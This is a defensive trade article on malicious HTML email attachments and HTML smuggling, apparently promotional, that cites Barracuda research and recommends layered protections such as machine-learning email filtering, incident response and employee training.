Can Your Email Security Software Detect These Hidden Threats?

Cybercriminals are increasingly using malicious HTML attachments to bypass security software, but solutions leveraging machine-learning and static code analysis aren’t being fooled.


Email attachments are a popular way to deliver viruses, ransomware, and other cyberattacks. Barracuda researchers have analyzed data on millions of attachments scanned by their security tools and found that HTML attachments are the most likely to be malicious. Twenty-one percent of all HTML attachments reviewed as part of the research were malicious.

HTML attachments are effective because they’re used frequently for legitimate communication, and it’s tough to identify the real ones from the malicious ones. Attackers often disguise these attachments as weekly reports or notifications, tricking end users into clicking on phishing links. Because there are no shady links in the email body, scammers can avoid anti-spam/virus technology.

Since the threat from malicious HTML attachments shows no signs of abating, it’s vital that MSPs, VARs and their clients fully understand the nature of this threat and what steps can help protect their employees from falling victim to these scams.

How HTML Attacks Work

For HTML attachments that include a link to a phishing site, the HTML file uses JavaScript to redirect the victim to a third-party machine and then asks for credentials or initiates a malware download. HTML attachments can also be viewed as a form embedded within the email, which, when opened locally on the machine, will bypass the link scanning tools. Once login credentials are entered into this form, they can be passed directly to the hacker.

Because the HTML attachments don’t contain malware, it can be challenging to detect them. Email gateways and antivirus software may scan these attachments for malicious URLs, scripts or other tell-tale signs of an attack. However, the redirects or JavaScript can usually disguise them as normal attachments.

Using JavaScript in HTML attachments to hide phishing URLs is sometimes called HTML smuggling. Once the malicious script has been smuggled through traditional security systems, the victim’s web browser decodes the script, assembling whatever the payload may be on the host device. Moreover, the malware is built behind the firewall.

Security software only sees this activity as regular HTML and JavaScript traffic. While there are other approaches to mitigating these attacks, they can have significant downsides. For example, disabling JavaScript could stop some of these attacks but would make it impossible for users to render other web pages.

Companies need a multi-layered approach to successfully stop these attacks without impeding employee productivity – one that inspects email delivery and monitors endpoints, networks, and post-attack activities.

Stopping HTML Attacks

While HTML-based attacks are hard to spot, using a combination of tools and strategies can help companies improve the odds of stopping them.

First, your email protection system should scan and block malicious HTML attachments. As noted above, this is no easy task since the attachments look normal. However, an email security solution that leverages machine learning and static code analysis can better identify these emails because they can be trained to evaluate the contents of the actual email (not just the attachment). These systems use machine learning to establish what a regular email looks like and then apply that knowledge to detecting phishing scams.

For attacks that do get through, deploy an automated incident response solution that can quickly remove all instances of the email from inboxes across the organization. A solution that includes account takeover protection can also help spot misuse of credentials that may have been compromised. Finally, post-delivery remediation tools are critical to a multi-layered security approach.

Educate employees to help them spot malicious HTML attacks and make it easy to report potential incidents. For example, offer regular training, utilize phishing simulation campaigns to identify employees needing extra help, and provide updates about new threats or recent attacks so employees remain vigilant. In addition, everyone should be cautious of HTML attachments, and policies should be in place to encourage extra care when sharing login credentials.

Cyberattacks continue to grow in number and complexity. However, a holistic approach to email security that relies on machine learning, end user education, and other tools can keep data and networks safe from HTML-based attacks.